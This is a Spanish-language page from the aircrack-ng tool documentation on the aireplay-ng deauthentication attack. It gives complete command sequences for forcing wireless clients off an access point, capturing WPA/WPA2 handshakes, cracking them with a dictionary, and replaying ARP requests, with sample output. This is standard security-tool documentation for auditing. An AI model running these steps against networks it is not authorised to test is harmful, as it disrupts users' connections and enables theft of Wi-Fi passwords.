====== Deautenticación ====== ===== Descripción ===== Este ataque envia paquetes de desasociación a uno o más clientes que están actualmente asociados a un punto de acceso. Las razones por las que es útil desasociar clientes pueden ser: * Recuperar o desvelar un ESSID oculto. Este es un ESSID que no es divulgado o anunciado por el AP. * Capturar handshakes WPA/WPA2 forzando a los clientes a volverse a autenticar * Generar peticiones ARP (en Windows, algunas veces, los clientes borran su "ARP cache" cuando son desconectados) Por supuesto, este ataque es totalmente inútil si no existen clientes wireless asociados. ===== Uso ===== aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 Donde: * -0 significa deautenticación * 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras); 0 significa enviarlas continumente * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso * -c 00:0F:B5:34:30:30 es la dirección MAC del cliente a deautenticar; si se omite serán deautenticados todos los clientes *ath0 es el nombre de la interface ===== Ejemplos de uso ===== ==== Deautenticación típica ==== Primero, es necesario averiguar si hay algún cliente actualmente conectado. Necesitaremos su dirección MAC para el siguiente comando: aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0 Donde: * -0 significa deautenticación * 1 es el número de deautenticaciones a enviar (puedes enviar todas las que quieras) * -a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso * -c 00:0F:B5:34:30:30 es la dirección MAC del cliente que queremos deautenticar *ath0 es el nombre de la interface La salida será algo similar a esto: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] ==== Captura del Handshake WPA/WPA2 con Atheros ==== airmon-ng start ath0 airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0 (y abrimos otra consola) aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0 (esperamos algunos segundos) aircrack-ng -w /path/to/dictionary out.cap A continuación explicamos estos comandos: airodump-ng -c 6 --bssid 00:14:6C:7E:40:80 -w out ath0\\ Donde: *-c 6 es el número del canal *--bssid 00:14:6C:7E:40:80 limita los paquetes capturados únicamente a este punto de acceso *-w out es el nombre del archivo donde se guardarán las capturas *ath0 es el nombre de la interface aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0\\ Donde: *-0 significa ataque de deautenticación *5 es el número de paquetes de deautenticación a enviar *-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso *-c 00:0F:B5:AB:CB:9D es la dirección MAC del cliente que queremos deautenticar *ath0 es el nombre de la interface A continuación puedes ver la salida del comando "aireplay-ng -0 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AB:CB:9D ath0" 12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:56 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:57 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] 12:55:58 Sending DeAuth to station -- STMAC: [00:0F:B5:AB:CB:9D] ==== Generar peticiones ARP con una tarjeta Prism2 ==== airmon-ng start wlan0 airodump-ng -c 6 -w out --bssid 00:13:10:30:24:9C wlan0 (abrimos otra consola) aireplay-ng -0 10 -a 00:13:10:30:24:9C wlan0 aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0 Despues de enviar los 10 paquetes de deautenticación, comenzamos a escuchar para "pescar" algún "ARP requests" con el ataque 3. La opción -h es obligatoria y tiene que ser la dirección MAC de un cliente asociado. Si estás usando el driver [[http://www.linux-wlan.com/linux-wlan|wlan-ng/]], deberías ejecutar el script [[airmon-ng]] (a menos que sepas lo que estás haciendo) o sino la tarjeta no funcionará de forma correcta para poder inyectar. ===== Pistas de uso ===== Es más efectivo atacar a un cliente determinado usando la opción -c. Los paquetes de deautenticación son enviados directamente desde el PC a los clientes. Por lo que se debe comprobar que estamos físicamente cerca de los clientes para que les lleguen los paquetes que enviamos desde nuestra tarjeta wireless. (En [[airodump-ng]] mirar el PWR de los clientes y no el del AP) ===== Problemas de uso ===== Ninguno por el momento.